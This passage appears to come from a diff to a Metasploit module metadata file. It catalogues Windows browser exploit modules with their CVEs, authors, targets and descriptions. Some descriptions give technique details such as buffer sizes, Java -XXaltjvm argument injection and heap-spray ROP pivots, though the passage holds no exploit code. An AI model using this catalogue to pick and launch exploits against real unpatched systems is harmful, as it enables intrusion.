"ZDI-12-132", + "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21596862" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/inotes_dwa85w_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/inotes_dwa85w_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/intrust_annotatex_add": { + "name": "Quest InTrust Annotation Objects Uninitialized Pointer", + "fullname": "exploit/windows/browser/intrust_annotatex_add", + "aliases": [], + "rank": 200, + "disclosure_date": "2012-03-28", + "type": "exploit", + "author": [ + "rgod ", + "mr_me " + ], + "description": "This module exploits an uninitialized variable vulnerability in the\n Annotation Objects ActiveX component. The ActiveX component loads into memory without\n opting into ALSR so this module exploits the vulnerability against windows Vista and\n Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX\n points to part of the ROP chain in a heap chunk and the calculated call will hit the\n pivot in a separate heap chunk. This will take some time in the users browser.", + "references": [ + "CVE-2012-5896", + "OSVDB-80662", + "BID-52765", + "EDB-18674" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP/Vista SP0-SP3 (IE6/IE7)", + "Windows XP SP0-SP3 DEP bypass (IE8)", + "Windows 7/Vista ALSR/DEP bypass (IE8)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/intrust_annotatex_add.rb", + "is_install_path": true, + "ref_name": "windows/browser/intrust_annotatex_add", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_basicservice_impl": { + "name": "Sun Java Web Start BasicServiceImpl Code Execution", + "fullname": "exploit/windows/browser/java_basicservice_impl", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "Matthias Kaiser", + "egypt " + ], + "description": "This module exploits a vulnerability in Java Runtime Environment\n that allows an attacker to escape the Java Sandbox. By injecting\n a parameter into a javaws call within the BasicServiceImpl class\n the default java sandbox policy file can be therefore overwritten.\n The vulnerability affects version 6 prior to update 22.\n\n NOTE: Exploiting this vulnerability causes several sinister-looking\n popup windows saying that Java is \"Downloading application.\"", + "references": [ + "CVE-2010-3563", + "OSVDB-69043", + "URL-http://mk41ser.blogspot.com" + ], + "platform": "Java,Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Generic (Java Payload)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/java_basicservice_impl.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_basicservice_impl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_cmm": { + "name": "Java CMM Remote Code Execution", + "fullname": "exploit/windows/browser/java_cmm", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-03-01", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module abuses the Color Management classes from a Java Applet to run\n arbitrary Java code outside of the sandbox as exploited in the wild in February\n and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41\n and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1\n systems. This exploit doesn't bypass click-to-play, so the user must accept the java\n warning in order to run the malicious applet.", + "references": [ + "CVE-2013-1493", + "OSVDB-90737", + "BID-58238", + "URL-https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493", + "URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html", + "URL-http://web.archive.org/web/20161013042610/http://pastie.org/pastes/6581034" + ], + "platform": "Java,Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Generic (Java Payload)", + "Windows x86 (Native Payload)" + ], + "mod_time": "2025-02-07 12:36:11 +0000", + "path": "/modules/exploits/windows/browser/java_cmm.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_cmm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_codebase_trust": { + "name": "Sun Java Applet2ClassLoader Remote Code Execution", + "fullname": "exploit/windows/browser/java_codebase_trust", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-02-15", + "type": "exploit", + "author": [ + "Frederic Hoguin", + "jduck " + ], + "description": "This module exploits a vulnerability in the Java Runtime Environment\n that allows an attacker to run an applet outside of the Java Sandbox. When\n an applet is invoked with:\n\n 1. A \"codebase\" parameter that points at a trusted directory\n 2. A \"code\" parameter that is a URL that does not contain any dots\n\n the applet will run outside of the sandbox.\n\n This vulnerability affects JRE prior to version 6 update 24.", + "references": [ + "CVE-2010-4452", + "OSVDB-71193", + "ZDI-11-084", + "URL-http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/", + "URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html" + ], + "platform": "Java", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Generic (Java Payload)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/java_codebase_trust.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_codebase_trust", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_docbase_bof": { + "name": "Sun Java Runtime New Plugin docbase Buffer Overflow", + "fullname": "exploit/windows/browser/java_docbase_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a flaw in the new plugin component of the Sun Java\n Runtime Environment before v6 Update 22. By specifying specific parameters\n to the new plugin, an attacker can cause a stack-based buffer overflow and\n execute arbitrary code.\n\n When the new plugin is invoked with a \"launchjnlp\" parameter, it will\n copy the contents of the \"docbase\" parameter to a stack-buffer using the\n \"sprintf\" function. A string of 396 bytes is enough to overflow the 256\n byte stack buffer and overwrite some local variables as well as the saved\n return address.\n\n NOTE: The string being copied is first passed through the \"WideCharToMultiByte\".\n Due to this, only characters which have a valid localized multibyte\n representation are allowed. Invalid characters will be replaced with\n question marks ('?').\n\n This vulnerability was originally discovered independently by both Stephen\n Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't\n been done, all versions since version 6 Update 10 are believed to be affected\n by this vulnerability.\n\n This vulnerability was patched as part of the October 2010 Oracle Patch\n release.", + "references": [ + "CVE-2010-3552", + "OSVDB-68873", + "BID-44023", + "URL-http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html", + "ZDI-10-206", + "URL-http://code.google.com/p/skylined/issues/detail?id=23", + "URL-http://web.archive.org/web/20130119152812/http://skypher.com:80/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/", + "URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal (msvcr71.dll ROP)" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/browser/java_docbase_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_docbase_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_mixer_sequencer": { + "name": "Java MixerSequencer Object GM_Song Structure Handling Vulnerability", + "fullname": "exploit/windows/browser/java_mixer_sequencer", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-03-30", + "type": "exploit", + "author": [ + "Peter Vreugdenhil", + "juan vazquez " + ], + "description": "This module exploits a flaw within the handling of MixerSequencer objects\n in Java 6u18 and before.\n\n Exploitation id done by supplying a specially crafted MIDI file within an RMF\n File. When the MixerSequencer objects is used to play the file, the GM_Song\n structure is populated with a function pointer provided by a SONG block in the\n RMF. A Midi block that contains a MIDI with a specially crafted controller event\n is used to trigger the vulnerability.\n\n When triggering the vulnerability \"ebx\" points to a fake event in the MIDI file\n which stores the shellcode. A \"jmp ebx\" from msvcr71.dll is used to make the\n exploit reliable over java updates.", + "references": [ + "CVE-2010-0842", + "OSVDB-63493", + "BID-39077", + "ZDI-10-060", + "URL-http://web.archive.org/web/20210624004250/http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows / Java 6 <=u18" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/browser/java_mixer_sequencer.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_mixer_sequencer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_ws_arginject_altjvm": { + "name": "Sun Java Web Start Plugin Command Line Argument Injection", + "fullname": "exploit/windows/browser/java_ws_arginject_altjvm", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-04-09", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a flaw in the Web Start plugin component of Sun Java\n Web Start. The arguments passed to Java Web Start are not properly validated.\n By passing the lesser known -J option, an attacker can pass arbitrary options\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\n an unsuspecting browser user.\n\n This vulnerability was originally discovered independently by both Ruben\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n In order for this module to work, it must be ran as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.", + "references": [ + "CVE-2010-0886", + "CVE-2010-1423", + "OSVDB-63648", + "BID-39346", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html", + "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Java Runtime on Windows x86" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_ws_arginject_altjvm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_ws_double_quote": { + "name": "Sun Java Web Start Double Quote Injection", + "fullname": "exploit/windows/browser/java_ws_double_quote", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-10-16", + "type": "exploit", + "author": [ + "Rh0 " + ], + "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. Parameters initial-heap-size and max-heap-size in a JNLP\n file can contain a double quote which is not properly sanitized when creating\n the command line for javaw.exe. This allows the injection of the -XXaltjvm\n option to load a jvm.dll from a remote UNC path into the java process. Thus\n an attacker can execute arbitrary code in the context of a browser user.\n This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB (In most cases, this means non-Windows hosts). Additionally,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n Alternatively, a UNC path containing a jvm.dll can be specified, bypassing\n the Windows limitation for the Metasploit host.", + "references": [ + "CVE-2012-1533", + "OSVDB-86348", + "BID-56046", + "URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html", + "URL-http://pastebin.com/eUucVage " + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Java Runtime 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 on Windows x86" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/java_ws_double_quote.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_ws_double_quote", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_ws_vmargs": { + "name": "Sun Java Web Start Plugin Command Line Argument Injection", + "fullname": "exploit/windows/browser/java_ws_vmargs", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-02-14", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. The arguments passed to Java Web Start are not properly\n validated, allowing injection of arbitrary arguments to the JVM.\n\n By utilizing the lesser known -J option, an attacker can take advantage of\n the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method\n allows an attacker to execute arbitrary code in the context of an unsuspecting\n browser user.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.", + "references": [ + "CVE-2012-0500", + "OSVDB-79227", + "BID-52015", + "URL-https://seclists.org/fulldisclosure/2012/Feb/251", + "URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Java Runtime on Windows x86" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/java_ws_vmargs.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_ws_vmargs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/juniper_sslvpn_ive_setupdll": { + "name": "Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/juniper_sslvpn_ive_setupdll", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-04-26", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in the JuniperSetupDLL.dll\n library which is called by the JuniperSetup.ocx ActiveX\tcontrol,\n as part of the Juniper SSL-VPN (IVE) appliance. By specifying an\n overly long string to the ProductName object parameter, the stack\n is overwritten.", + "references": [ + "CVE-2006-2086", + "OSVDB-25001", + "BID-17712", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0743.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP3 English", + "Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb", + "is_install_path": true, + "ref_name": "windows/browser/juniper_sslvpn_ive_setupdll", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/kazaa_altnet_heap": { + "name": "Kazaa Altnet Download Manager ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/kazaa_altnet_heap", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX\n Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7.\n By sending an overly long string to the \"Install()\" method, an attacker may be\n able to execute arbitrary code.", + "references": [ + "CVE-2007-5217", + "OSVDB-37785", + "URL-http://web.archive.org/web/20071014051150/http://secunia.com:80/advisories/26970" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / IE 6.0SP1 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/kazaa_altnet_heap.rb", + "is_install_path": true, + "ref_name": "windows/browser/kazaa_altnet_heap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/keyhelp_launchtripane_exec": { + "name": "KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability", + "fullname": "exploit/windows/browser/keyhelp_launchtripane_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-26", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a code execution vulnerability in the KeyScript ActiveX\n control from keyhelp.ocx. It is packaged in several products or GE, such as\n Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy\n Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver between 7.20 and 7.42.\n When the control is installed with these products, the function \"LaunchTriPane\"\n will use ShellExecute to launch \"hh.exe\", with user controlled data as parameters.\n Because of this, the \"-decompile\" option can be abused to write arbitrary files on\n the remote system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine, and then upload another mof file, which enables Windows Management\n Instrumentation service to execute it. Please note that this module currently only\n works for Windows before Vista.\n\n On the other hand, the target host must have the WebClient service (WebDAV\n Mini-Redirector) enabled. It is enabled and automatically started by default on\n Windows XP SP3", + "references": [ + "CVE-2012-2516", + "OSVDB-83311", + "BID-55265", + "ZDI-12-169", + "URL-http://support.ge-ip.com/support/index?page=kbchannel&id=S:KB14863" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/keyhelp_launchtripane_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/browser/logitechvideocall_start": { + "name": "Logitech VideoCall ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/logitechvideocall_start", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-05-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX\n Control (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the\n \"Start()\" method, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-2918", + "OSVDB-36820", + "BID-24254" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/logitechvideocall_start.rb", + "is_install_path": true, + "ref_name": "windows/browser/logitechvideocall_start", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/lpviewer_url": { + "name": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/lpviewer_url", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-06", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\n sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-4384", + "OSVDB-48946", + "US-CERT-VU-848873", + "BID-31604" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/lpviewer_url.rb", + "is_install_path": true, + "ref_name": "windows/browser/lpviewer_url", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/macrovision_downloadandexecute": { + "name": "Macrovision InstallShield Update Service Buffer Overflow", + "fullname": "exploit/windows/browser/macrovision_downloadandexecute", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-10-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Macrovision InstallShield Update\n Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to\n the DownloadAndExecute method, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-5660", + "OSVDB-38347" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0/SP1 Pro English", + "Windows 2000 Pro English All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/macrovision_downloadandexecute.rb", + "is_install_path": true, + "ref_name": "windows/browser/macrovision_downloadandexecute", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/macrovision_unsafe": { + "name": "Macrovision InstallShield Update Service ActiveX Unsafe Method", + "fullname": "exploit/windows/browser/macrovision_unsafe", + "aliases": [], + "rank": 600, + "disclosure_date": "2007-10-20", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module allows attackers to execute code via an unsafe method in Macrovision InstallShield 2008.", + "references": [ + "CVE-2007-5660", + "OSVDB-38347", + "BID-26280" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/macrovision_unsafe.rb", + "is_install_path": true, + "ref_name": "windows/browser/macrovision_unsafe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/malwarebytes_update_exec": { + "name": "Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution", + "fullname": "exploit/windows/browser/malwarebytes_update_exec", + "aliases": [], + "rank": 400, + "disclosure_date": "2014-12-16", + "type": "exploit", + "author": [ + "Yonathan Klijnsma", + "Gabor Seljan", + "todb " + ], + "description": "This module exploits a vulnerability in the update functionality of\n Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n Anti-Exploit consumer 1.03.1.1220.\n Due to the lack of proper update package validation, a man-in-the-middle\n (MITM) attacker could execute arbitrary code by spoofing the update server\n data-cdn.mbamupdates.com and uploading an executable. This module has\n been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.", + "references": [ + "CVE-2014-4936", + "OSVDB-116050", + "URL-http://web.archive.org/web/20241212224255/http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2025-02-07 12:36:11 +0000", + "path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/malwarebytes_update_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/maxthon_history_xcs": { + "name": "Maxthon3 about:history XCS Trusted Zone Code Execution", + "fullname": "exploit/windows/browser/maxthon_history_xcs", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-11-26", + "type": "exploit", + "author": [ + "Roberto Suggi Liverani", + "sinn3r ", + "juan vazquez " + ], + "description": "Cross Context Scripting (XCS) is possible in the Maxthon about:history page.\n Injection in such privileged/trusted browser zone can be used to modify\n configuration settings and execute arbitrary commands.\n\n Please note this module only works against specific versions of XCS. Currently,\n we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.", + "references": [ + "OSVDB-88191", + "EDB-23225", + "URL-http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Maxthon 3 (prior to 3.3) on Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/maxthon_history_xcs.rb", + "is_install_path": true, + "ref_name": "windows/browser/maxthon_history_xcs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mcafee_mcsubmgr_vsprintf": { + "name": "McAfee Subscription Manager Stack Buffer Overflow", + "fullname": "exploit/windows/browser/mcafee_mcsubmgr_vsprintf", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-08-01", + "type": "exploit", + "author": [ + "skape " + ], + "description": "This module exploits a flaw in the McAfee Subscription Manager ActiveX control.\n Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by\n passing a large string to one of the COM-exposed routines, such as IsAppExpired.\n This vulnerability was discovered by Karl Lynn of eEye.", + "references": [ + "CVE-2006-3961", + "OSVDB-27698", + "BID-19265" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb", + "is_install_path": true, + "ref_name": "windows/browser/mcafee_mcsubmgr_vsprintf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mcafee_mvt_exec": { + "name": "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability", + "fullname": "exploit/windows/browser/mcafee_mvt_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-04-30", + "type": "exploit", + "author": [ + "rgod", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in McAfee Virtual Technician's\n MVTControl. This ActiveX control can be abused by using the GetObject() function\n to load additional unsafe classes such as WScript.Shell, therefore allowing remote\n code execution under the context of the user.", + "references": [ + "CVE-2012-4598", + "OSVDB-81657", + "EDB-18805", + "URL-https://kc.mcafee.com/corporate/index?page=content&id=SB10028" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mcafee_mvt_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/mcafee_mvt_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mcafeevisualtrace_tracetarget": { + "name": "McAfee Visual Trace ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/mcafeevisualtrace_tracetarget", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-07-07", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX\n Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the\n \"TraceTarget()\" method, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2006-6707", + "OSVDB-32399", + "URL-http://web.archive.org/web/20061223042405/http://secunia.com:80/advisories/23463/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP2 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb", + "is_install_path": true, + "ref_name": "windows/browser/mcafeevisualtrace_tracetarget", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mirc_irc_url": { + "name": "mIRC IRC URL Buffer Overflow", + "fullname": "exploit/windows/browser/mirc_irc_url", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-10-13", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in mIRC 6.1. By\n submitting an overly long and specially crafted URL to\n the 'irc' protocol, an attacker can overwrite the buffer\n and control program execution.", + "references": [ + "CVE-2003-1336", + "OSVDB-2665", + "BID-8819" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English All", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mirc_irc_url.rb", + "is_install_path": true, + "ref_name": "windows/browser/mirc_irc_url", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_attribchildremoved": { + "name": "Firefox 8/9 AttributeChildRemoved() Use-After-Free", + "fullname": "exploit/windows/browser/mozilla_attribchildremoved", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-12-06", + "type": "exploit", + "author": [ + "regenrecht", + "Lincoln ", + "corelanc0d3r " + ], + "description": "This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1.\n Removal of child nodes from the nsDOMAttribute can allow for a child\n to still be accessible after removal due to a premature notification\n of AttributeChildRemoved. Since mFirstChild is not set to NULL until\n after this call is made, this means the removed child will be accessible\n after it has been removed. By carefully manipulating the memory layout,\n this can lead to arbitrary code execution.", + "references": [ + "CVE-2011-3659", + "OSVDB-78736", + "ZDI-12-110", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708198" + ], + "platform": 